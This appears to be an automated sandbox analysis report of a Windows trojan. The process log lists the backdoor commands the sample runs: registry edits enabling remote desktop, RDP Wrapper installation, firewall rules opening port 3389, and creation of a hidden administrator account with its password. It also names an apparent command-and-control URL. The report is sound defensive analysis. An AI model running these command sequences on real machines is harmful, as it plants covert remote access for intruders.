                            Source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.10.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 0000000A.00000000.2105035619.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus.
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/115
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/issues/54
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus/wiki/Bogus-Premium
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/bchavez/Bogus:
                            Source: file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: file.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu
                            Source: file.exe, 00000000.00000002.2500984157.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.php
                            Source: file.exe, 00000000.00000002.2500984157.0000000003688000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/core/receive.phpd
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://loremflickr.com
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://picsum.photos
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://placeimg.com
                            Source: RDPWInst.exeString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://via.placeholder.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2

                            System Summary

                            barindex
                            Source: file.exeStatic PE information: section name: .T"G
                            Source: file.exeStatic PE information: section name: .}wo
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05765FA8 NtProtectVirtualMemory,0_2_05765FA8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05766080 NtAllocateVirtualMemory,0_2_05766080
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05765FA1 NtProtectVirtualMemory,0_2_05765FA1
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05766079 NtAllocateVirtualMemory,0_2_05766079
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_015998500_2_01599850
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159C0480_2_0159C048
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_015990400_2_01599040
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_015910980_2_01591098
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159B3780_2_0159B378
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159BE100_2_0159BE10
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01598EE80_2_01598EE8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159A1090_2_0159A109
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159D8680_2_0159D868
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159106A0_2_0159106A
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_015990310_2_01599031
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159BAB00_2_0159BAB0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159DD090_2_0159DD09
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159BDFF0_2_0159BDFF
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01599FF00_2_01599FF0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01599FE00_2_01599FE0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01598EC00_2_01598EC0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0159DEF10_2_0159DEF1
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05766CB80_2_05766CB8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05762F100_2_05762F10
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057678600_2_05767860
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057600400_2_05760040
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057600400_2_05760040
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05766CA80_2_05766CA8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05762F020_2_05762F02
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057627E80_2_057627E8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057646010_2_05764601
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057696980_2_05769698
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0576499A0_2_0576499A
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057688400_2_05768840
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057600070_2_05760007
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057650E00_2_057650E0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057638A00_2_057638A0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057638900_2_05763890
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_057658980_2_05765898
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05763AF00_2_05763AF0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05763AE00_2_05763AE0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072E5DB00_2_072E5DB0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072E51980_2_072E5198
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072E54E00_2_072E54E0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040360C10_2_0040360C
                            Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: file.exe, 00000000.00000002.2503746431.0000000005770000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBogus.dll, vs file.exe
                            Source: file.exe, 00000000.00000002.2500311162.00000000015CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                            Source: file.exe, 00000000.00000002.2507908437.0000000007A40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOpen.Nat.dll2 vs file.exe
                            Source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerfxvmt.dllj% vs file.exe
                            Source: file.exe, 00000000.00000002.2500984157.00000000035EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPWInst.exeB vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs file.exe
                            Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: 0.2.file.exe.5770000.1.raw.unpack, LicenseVerifier.csBase64 encoded string: 'vBgOPQiBhRR22ClUzIBJCmxcaOWfuAweUNpodRuZWDn8whviOe4JdA/sjzqw54KGh1qHJIc7JY5sGTCxNZQiSuyZQ6iHK2ykmU0Yb+QBvbqG33x2R7Di8MoNA1Tv2fX7SSny++IKEOQEEvwYhYr6oRU8sVItMcybUjiaaSw1rbU='
                            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@46/9@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,10_2_0043BF00
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0040FAE8 GetDiskFreeSpaceW,10_2_0040FAE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,10_2_0043DC64
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 10_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,10_2_0043B1A8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                            Source: Yara matchFile source: 10.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000000.2104981738.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: file.exeString found in binary or memory: /add
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user BoydKrajcik hDNQhfjKM9S0 /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /add
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" BoydKrajcik /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /add
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" BoydKrajcik /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" BoydKrajcik /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /add
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user BoydKrajcik hDNQhfjKM9S0 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" BoydKrajcik /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /addJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
